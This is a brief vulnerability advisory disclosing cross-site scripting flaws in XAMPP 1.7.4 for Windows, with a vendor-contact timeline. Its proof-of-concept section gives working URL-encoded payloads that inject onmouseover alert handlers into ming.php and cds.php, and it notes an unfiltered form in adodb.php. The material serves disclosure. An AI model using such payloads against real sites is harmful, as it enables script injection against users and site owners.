Xampp version 1.7.4 for Windows suffers from cross site scripting vulnerabilities.
cd1c116e00f67c7bd2d9a1dffc91e3af3e2a36d6d43eac27b4dc04258e04bcc5
$-------------------------------------------------------------------------------------------------------------------
$ Xampp 1.7.4 for Windows multiple Site Scripting Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :https://www.apachefriends.org/en/xampp-windows.html
$ Date :07/12/2011
$ Twitter: https://twitter.com/Sangte_amtham
$******************************************************************************************
1.Description:
XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really
very easy to install and to use - just download, extract and start.
2. Patch:
Jul 12, 2011: Contact to vendor.
Jul 12, 2011: Vendor said that they would fix in next release
Sep 21, 2011: Released XAMPP 1.7.7
Oct 27, 2011: Release the bug.
3. POC:
https://localhost/xampp/ming.php?text=%22%20onmouseover%3dalert%28%22XSS%22%29%20bad%22
https://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
In adodb.php, we have a form to submit database information, but this form is not filer well. So web can submit the
malicious codes.
https://localhost/xampp/adodb.php
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------